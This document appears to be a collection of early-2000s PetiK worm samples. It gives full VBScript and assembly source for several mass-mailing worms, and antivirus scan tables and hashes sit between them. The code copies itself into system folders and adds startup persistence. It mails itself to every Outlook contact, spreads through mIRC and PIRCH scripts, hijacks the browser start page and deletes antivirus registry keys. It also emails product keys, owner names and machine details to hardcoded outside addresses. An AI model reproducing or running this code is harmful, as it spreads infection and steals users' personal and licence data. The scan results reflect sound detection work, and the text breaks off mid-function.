K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.03
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.I
NOD32 4080 2009.05.15 VBS/Petik.A
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A@mm
Panda 10.0.0.14 2009.05.16 VBS/I-Worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.I
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Judge
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.B@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_JUDGE.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.I

Additional information
File size: 2587 bytes
MD5...: 538a05a6e0dd048eae2c3b06338bd5d7
SHA1..: fef767df96e3dbeb009d6cd746bee12c33fb3257
' Name : VBS.Noel
' Author : PetiK
' Language : VBS
' Date : 12/12/2000

Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")

DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy("C:\NOEL.GIF.vbs")
EMAIL()
End Sub

Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "JOUYEUX NOEL"
msg.Body = "Voici une photodu PERE NOEL"
msg.Attachments.Add ("C:\NOEL.GIF.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pif878@aol.com"
nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
CN = CreateObject("WScript.NetWork").ComputerName
msg2.Subject = "Message de """ & nom & """ alias " & CN & ""
page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey")
msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """"
msg2.Send
End Sub
File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.11 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.11 VBS/Petik
AntiVir 7.9.0.166 2009.05.10 Worm/Petik.J1
Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.10 VBS/Petik.M@mm
Avast 4.8.1335.0 2009.05.10 VBS:MailWorm-gen
AVG 8.5.0.327 2009.05.10 VBS/VBSWG
BitDefender 7.2 2009.05.11 Generic.ScriptWorm.A79766E0
CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.M
ClamAV 0.94.1 2009.05.11 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.11 modification of VBS.Generic.458
eSafe 7.0.17.0 2009.05.10 -
eTrust-Vet 31.6.6497 2009.05.08 VBS/Buggy
F-Prot 4.4.4.56 2009.05.10 VBS/Petik.M@mm
F-Secure 8.0.14470.0 2009.05.11 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.10 VBS/Petik.J@mm
GData 19 2009.05.11 Generic.ScriptWorm.A79766E0
Ikarus T3.1.1.49.0 2009.05.11 Email-Worm.Win32.Petik
K7AntiVirus 7.10.729 2009.05.08 -
Kaspersky 7.0.0.125 2009.05.11 Email-Worm.Win32.Petik
McAfee 5611 2009.05.10 W32/PetTick.vbs
McAfee+Artemis 5611 2009.05.10 W32/PetTick.vbs
McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.J1
Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.J
NOD32 4063 2009.05.08 probably unknown SCRIPT
Norman 6.01.05 2009.05.08 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.10 VBS.Petik.B@mm
Panda 10.0.0.14 2009.05.10 -
PCTools 4.4.2.0 2009.05.07 VBS.Petik.J
Prevx 3.0 2009.05.11 -
Rising 21.29.00.00 2009.05.11 Worm.Hopalong
Sophos 4.41.0 2009.05.11 VBS/Petik-J
Sunbelt 3.2.1858.2 2009.05.09 -
Symantec 1.4.4.12 2009.05.11 VBS.LoveLetter.Var
TheHacker 6.3.4.1.324 2009.05.09 -
TrendMicro 8.950.0.1092 2009.05.11 VBS_GENERIC.009
VBA32 3.12.10.4 2009.05.11 Email-Worm.Win32.Petik
ViRobot 2009.5.11.1728 2009.05.11 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.J

Additional information
File size: 1352 bytes
MD5...: fcc75e971157a8d9103b5bc583847f87
SHA1..: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5
comment $

W32.TWIN by PetiK on 20/12/2000

TO COMPILE:

tasm32 /M /ML ?????.asm

tlink32 -Tpe -x -aa ?????.obj,,,import32

.386
jumps
locals
.model flat, stdcall

;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn ExitProcess:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC

;USER32.dll
extrn MessageBoxA:PROC

;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
.data
fh dd ?
octets dd ?
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
szBAT db 260 dup (0)
szCopie db 260 dup (0)
szOrig db 260 dup (0)
szHTM db 260 dup (0)
szVBS db 260 dup (0)
szWin db 260 dup (0)
Copie db "\NAV5.exe",00h
BATFILE db "\IE55.bat",00h
HTMFILE db "\IE55.htm",00h
VBSFILE db "\IE55.vbs",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
CLE db "Software\[PetiK]",00h
CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h
NOM2 db "Start Page",00h

vbsd:
db 'rem IE55.vbs pour W32.TWiN',0dh,0ah
db '',0dh,0ah
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah
db 'ws.Run (sys&"\IE55.htm")',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\'
db 'Download Directory","C:\"',0dh,0ah
db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah
db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\'
db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah
db 'End If',0dh,0ah
db 'MIRC()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub MIRC()',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah
db ' Set c = (sys&"\NAV5.exe")',0dh,0ah
db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah
db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah
db ' srpt.WriteLine "[script]"',0dh,0ah
db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah
db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah
db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah
db ' srpt.WriteLine "n3=}"',0dh,0ah
db ' srpt.Close',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd
htmd:
db '<HTML><HEAD>',0dh,0ah
db '<TITLE>Plugin pour Internet Explorer / '
db 'Plugin for Internet Explorer</TITLE>',0dh,0ah
db '<SCRIPT language="JavaScript">',0dh,0ah
db 'site="http://www.multimania.com/kadosh/PlugIE55.exe ";',0dh,0ah
db 'temps = 10;',0dh,0ah
db '',0dh,0ah
db 'function affiche()',0dh,0ah
db '{ if (temps-- == 0) ',0dh,0ah
db ' { clearInterval(attente);',0dh,0ah
db ' location.href=site;',0dh,0ah
db ' return;',0dh,0ah
db ' }',0dh,0ah
db ' document.forms[0].elements[0].value = temps;',0dh,0ah
db '}',0dh,0ah
db '</SCRIPT>',0dh,0ah
db ' ',0dh,0ah
db '</HEAD>',0dh,0ah
db '<BODY bgColor=black text=red onload='''attente = setInterval'
db '("affiche()", 1000);'''>',0dh,0ah
db '<DIV align=center>',0dh,0ah
db '<H1>Plugin pour Microsoft Internet Explorer</H1>',0dh,0ah
db '<H1>Plugin for Microsoft Internet Explorer</H1>',0dh,0ah
db '</DIV>',0dh,0ah
db '<DIV align=left>',0dh,0ah
db '<HR SIZE=4>',0dh,0ah
db '<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>',0dh,0ah
db '<H3>Please download the plugin in C:\ path</H3>',0dh,0ah
db '<HR SIZE=1>',0dh,0ah
db '</DIV>',0dh,0ah
db '<DIV align=center>',0dh,0ah
db '<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>',0dh,0ah
db '</FORM></DIV></BODY></HTML>',0dh,0ah
htmtaille equ $-htmd
batd:
db '@echo off',0dh,0ah
db 'start C:\WINDOWS\SYSTEM\IE55.vbs',00h
battaille equ $-batd

.code
DEBUT: mov eax, offset CLE ; Check whether a [PetiK] key
call REG ; exists in HKLM\Software.
cmp [regDisp],1 ; If it is not there, copy itself
jne FIN ; and then modify the WIN.INI file

WCOPIE: push 0 ;
call GetModuleHandleA ;
push 260 ; The program copies itself into
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; the computer's WINDOWS folder
push 260 ;
push offset szCopie ; under the name NAV5.exe
call GetWindowsDirectoryA ;
push offset Copie ;
push offset szCopie ;
call lstrcat ;
push 0 ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;

WIN_INI:push 260 ; Put an entry in the WIN.INI file
push offset szWin ; so that the program is started
call GetWindowsDirectoryA ; at every boot.
push offset Winini ; This avoids using the REGISTRY,
push offset szWin ; which is too conspicuous.
call lstrcat ;
push offset szWin ; In WIN.INI in the WINDOWS folder:
push offset szCopie ; "program name"
push offset run ; run=
push offset windows ; [windows]
call WritePrivateProfileStringA ;

BAT: push 260 ;
push offset szBAT ;
call GetSystemDirectoryA ;
push offset BATFILE ;
push offset szBAT ;
call lstrcat ;
push 00000000h ;
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset szBAT ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push battaille ;
push offset batd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;

VBS: push 260 ; Create a file in the
push offset szVBS ;
call GetSystemDirectoryA ; SYSTEM directory
push offset VBSFILE ;
push offset szVBS ; called IE55.VBS
call lstrcat ;
push 00000000h ;
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset szVBS ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push vbstaille ;
push offset vbsd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;

HTM: push 260 ; Create a file in the
push offset szHTM ;
call GetSystemDirectoryA ; SYSTEM directory
push offset HTMFILE ;
push offset szHTM ; called IE55.HTM
call lstrcat ;
push 00000000h ;
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset szHTM ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push htmtaille ;
push offset htmd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;

BDR: push offset l ;
push offset p ;
push 0 ;
push 1F0000h + 1 + 2h ;
push 0 ;
push 0 ;
push 0 ;
push offset CLE2 ;
push 80000001h ; HKEY_CURRENT_USER
call RegCreateKeyExA ;
push 05h ;
push offset szVBS ; Create a key in the
push 01h ;
push 0 ;
push offset NOM2 ; Registry so that the VBS
push p ;
call RegSetValueExA ;
push 0 ; file is launched when the
call RegCloseKey ; user goes on the Internet
jmp FIN ;

REG: push offset regDisp ;
push offset regResu ;
push 0 ; default security descriptor
push 0F003FH ; KEY_ALL_ACCESS
push 0 ;
push 0 ;
push 0 ;
push eax ; address of the subkey
push 80000002h ; HKEY_LOCAL_MACHINE
call RegCreateKeyExA ;
push [regResu] ;
call RegCloseKey ;
ret ;

FIN: push 0 ;
call ExitProcess ; End of program
end DEBUT

IE55.HTM

<HTML><HEAD>
<TITLE>Plugin pour Internet Explorer / Plugin for Internet Explorer</TITLE>
<SCRIPT language="JavaScript">
site="http://www.multimania.com/kadosh/PlugIE55.exe ";
temps = 10;

function affiche()
{ if (temps-- == 0)
{ clearInterval(attente);
location.href=site;
return;
}
document.forms[0].elements[0].value = temps;
}
</SCRIPT>
</HEAD>
<BODY bgColor=black text=red onload='attente = setInterval("affiche()", 1000);'>
<DIV align=center>
<H1>Plugin pour Microsoft Internet Explorer</H1>
<H1>Plugin for Microsoft Internet Explorer</H1>
</DIV>
<DIV align=left>
<HR SIZE=4>
<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>
<H3>Please download the plugin in C:\ path</H3>
<HR SIZE=1>
</DIV>
<DIV align=center>
<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>
</FORM></DIV></BODY></HTML>
' Name : VBS/mIRC/NetWork.A
' Author : PetiK
' Language : VBS
' Date : 29/12/2000

'VBS/mIRC/NetWork.A by PetiK 29/12/2000

Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll

DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
Set c = fso.GetFile(WScript.ScriptFullName)
NetWork = (win&"\Network.vbs")
c.Copy (NetWork)
ws.RegWrite RS,NetWork
'NORTON()
MIRC()
ESPION()
EMAIL()
End Sub

Sub NORTON()
ws.RegDelete ("HKLM\Software\Symantec\")
ws.RegDelete ("HKCU\Software\Symantec\")
End Sub

Sub ESPION()
Set win = fso.GetSpecialFolder(0)
Set A = CreateObject("Outlook.Application")
Set B = A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D = 1 To C.AddressEntries.Count
Set E = C.Addressentries(D)
Next
End If
Next
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName")
REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper")
DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut")
PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
Set aze = fso.CreateTextFile ("C:\ESPION.txt",true)
aze.WriteLine "Information sur l'ordinateur"
aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName
aze.WriteLine "NOM D'UTILISATEUR : " & NOM
aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT
aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM
aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2
aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3
aze.WriteLine "PAPIER PEINT DE BUREAU : " & PPDB
aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES"
aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name
aze.WriteLine "ADDRESSE : " & E.Address
aze.WriteBlankLines(2)
aze.WriteLine "Information sur internet"
aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM
aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR
End Sub
Sub MIRC()
On Error Resume Next
NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork")
script = ("C:\script.ini")
Set srpt = fso.CreateTextFile(script, true)
srpt.WriteLine "[script]; par PetiK "
srpt.WriteLine "n0=on 1:JOIN:#:{"
srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"
srpt.WriteLine "n2= /dcc send $nick " & NET2
srpt.WriteLine "n3=}"
srpt.Close
fso.CopyFile script, "C:\mirc\script.ini"
fso.CopyFile script, "C:\mirc32\script.ini"
fso.CopyFile script, "C:\program files\mirc\script.ini"
fso.CopyFile script, "C:\program files\mirc32\script.ini"
fso.DeleteFile ("C:\script.ini")
End Sub

Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "NetWork Game for WINDOWS"
msg.Body = "The new game for your computer arrives"
msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com"
msg2.Subject = "Message écrit le " & date
msg2.Body = "Il était " & time
msg2.Attachments.Add ("C:\ESPION.txt")
msg2.Send
fso.DeleteFile ("C:\ESPION.txt")
End Sub
File Network.vbs received on 05.16.2009 17:59:59 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.892F765D
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.L
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 modification of W97M.Necronom
eSafe 7.0.17.0 2009.05.14 VBS.Scramble.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/PETIK.K1
GData 19 2009.05.16 Generic.ScriptWorm.892F765D
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.K
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.C@mm
Panda 10.0.0.14 2009.05.16 VBS/Generic.worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.K
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Petik-K
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.K1
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -

Additional information
File size: 4245 bytes
MD5...: af1121c899b152b95520214e4873e466
SHA1..: 2201e0075c58deed1db798dcc1c0c9f50d7086db
' Name : VBS.Kadosh
' Author : PetiK
' Language : VBS
' Date : 06/01/2001

' VBS/Kadosh.A by PandaKiller

' This file copies itself into the WINDOWS directory under the name
' WINEXEC.EXE.VBS and into the SYSTEM directory as winRun.dll.vbs
' It changes the web start page and sets it to LIVE.MULTIMANIA.COM
' WARNING : Norton detects this program as the virus VBS.NewLove.A
' THIS IS NOT A VIRUS : IT DESTROYS NOTHING

DEBUT()
Sub DEBUT()
Set a = CreateObject("Scripting.FileSystemObject")
Set win = a.GetSpecialFolder(0)
Set sys = a.GetSpecialFolder(1)
Set c = a.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinExec.exe.vbs")
c.Copy(sys&"\WinRun.dll.vbs")
INTERNET()
EMAIL()
msgbox "Le tour du monde en 20 jours",vbinformation
End Sub
' CHANGES THE INTERNET START PAGE

Sub INTERNET()
Set W = Wscript.CreateObject("WScript.Shell")
W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"live.multimania.com"
W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec",
"C:\WINDOWS\WinExec.exe.vbs"
End Sub

' SENDS A COPY OF ITSELF TO EVERY RECIPIENT IN THE ADDRESS BOOK
Sub EMAIL()
Set K = CreateObject("Outlook.Application")
Set L = K.GetNameSpace("MAPI")
For Each M In L.AddressLists
If M.AddressEntries.Count <> 0 Then
Set N = K.CreateItem(0)
For O = 1 To M.AddressEntries.Count
Set P = M.AddressEntries(O)
If O = 1 Then
N.BCC = P.Address
Else
N.BCC = N.BCC & "; " & P.Address
End If
Next
N.Subject = "Le Tour du Monde"
N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite"
Set Q = CreateObject("Scripting.FileSystemObject")
N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs")
N.Send
End If
Next
End Sub
File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.11 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.11 -
AntiVir 7.9.0.166 2009.05.10 Worm/Petik.05
Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.10 VBS/Petik.W@mm
Avast 4.8.1335.0 2009.05.10 VBS:MailWorm-gen
AVG 8.5.0.327 2009.05.10 I-Worm/Petik
BitDefender 7.2 2009.05.11 Generic.ScriptWorm.EDFACDDC
CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.W
ClamAV 0.94.1 2009.05.11 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.11 WORM.Virus
eSafe 7.0.17.0 2009.05.10 -
eTrust-Vet 31.6.6497 2009.05.08 VBS/Sodak
F-Prot 4.4.4.56 2009.05.10 VBS/Petik.W@mm
F-Secure 8.0.14470.0 2009.05.11 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.10 VBS/Petik.M@mm
GData 19 2009.05.11 Generic.ScriptWorm.EDFACDDC
Ikarus T3.1.1.49.0 2009.05.11 Email-Worm.Win32.Petik
K7AntiVirus 7.10.729 2009.05.08 VBS.Generic.MassMailer
Kaspersky 7.0.0.125 2009.05.11 Email-Worm.Win32.Petik
McAfee 5611 2009.05.10 VBS/Generic@MM
McAfee+Artemis 5611 2009.05.10 VBS/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.05
Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.L
NOD32 4063 2009.05.08 probably unknown SCRIPT
Norman 6.01.05 2009.05.08 VBS/Autorun.AP
nProtect 2009.1.8.0 2009.05.10 VBS.Petik.D@mm
Panda 10.0.0.14 2009.05.10 -
PCTools 4.4.2.0 2009.05.07 VBS.Petik.L
Prevx 3.0 2009.05.11 -
Rising 21.29.00.00 2009.05.11 Worm.Hopalong
Sophos 4.41.0 2009.05.11 VBS/Petik-L
Sunbelt 3.2.1858.2 2009.05.09 -
Symantec 1.4.4.12 2009.05.11 VBS.LoveLetter.Var
TheHacker 6.3.4.1.324 2009.05.09 -
TrendMicro 8.950.0.1092 2009.05.11 VBS_GENERIC.001
VBA32 3.12.10.4 2009.05.11 Email-Worm.Win32.Petik
ViRobot 2009.5.11.1728 2009.05.11 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.L

Additional information
File size: 1683 bytes
MD5...: 763d1411edc603a60b7fdd2f63d77579
SHA1..: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49
' Name : VBS.ShowVar
' Author : PetiK
' Language : VBS
' Date : 17/01/2001

' Copies itself to %WINDIR%\Showvar.vbs

' Adds to registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run
' Showvar = %WINDIR%\Showvar.vbs
' Spreads with MIRC by writing a script.
' Spreads via PIRCH.
' Spreads via mail :
' Subject : "Salut l'ami. Ouvre vite, la chance peut tourner !!"
' No file attached; the worm's code is directly in the HTML code of the mail.
' It creates a VBS file in the WINDIR directory and runs it.
' When the day is the 5th, a message box is shown

'ShowVar by PetiK 21/01/2000


Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll

DEBUT()
Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
Set c = fso.GetFile(WScript.ScriptFullName)
ShowVar = (win&"\Showvar.vbs")
c.Copy (ShowVar)
ws.RegWrite RUN,ShowVar
If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then
Mirc ""
End If
If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then
Pirch ""
End If
if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then
EMail()
End If
Divers()
End Sub

Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & SV2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1"
End If
End Function

Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar")
If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
